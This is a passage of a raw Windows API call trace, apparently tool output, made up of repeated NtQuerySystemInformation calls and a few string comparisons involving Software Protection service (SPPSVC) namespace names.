(_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0270.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0270.754] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0270.763] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0270.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0270.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0270.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc270, Length=0x28, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0270.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc190, Length=0x20, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 